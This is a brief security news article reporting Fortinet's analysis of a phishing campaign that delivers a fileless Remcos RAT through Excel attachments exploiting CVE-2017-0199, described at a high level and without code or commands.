In a recent wave of cyber threats, a new phishing campaign has emerged, cleverly utilizing an Excel file to distribute a fileless version of the notorious Remcos Remote Access Trojan (RAT). This sophisticated attack vector allows hackers to infiltrate target devices and extract sensitive information seamlessly.
Phishing Tactics Unveiled
Researchers from Fortinet have conducted a thorough analysis of this campaign, revealing that threat actors are employing the familiar guise of purchase order emails to lure unsuspecting victims. These emails come with an attached Microsoft Excel file designed to exploit a known remote code execution vulnerability in Office (CVE-2017-0199). Once the file is activated, it triggers the download of an HTML Application (HTA) file from a remote server, which is subsequently launched via mshta.exe.malware.
Originally intended for legitimate remote administration tasks, Remcos has unfortunately been repurposed by cybercriminals, much like the infamous Cobalt Strike. The capabilities of Remcos are alarming; it can log keystrokes, capture screenshots, and execute commands on compromised systems, making it a formidable tool for unauthorized access and data theft.
What sets this particular variant apart is its fileless nature. As Fortinet explains, “Rather than saving the Remcos file into a local file and running it, it directly deploys Remcos in the current process’s memory.” This innovative approach means that the malware operates without leaving traditional file traces, making detection and removal significantly more challenging.
Email phishing remains a prevalent method for cybercriminals to infect devices and pilfer sensitive information. Its low cost and high efficiency make it an attractive option for attackers. To safeguard against such threats, users are advised to exercise caution when reviewing emails and to remain vigilant when downloading and executing attachments.
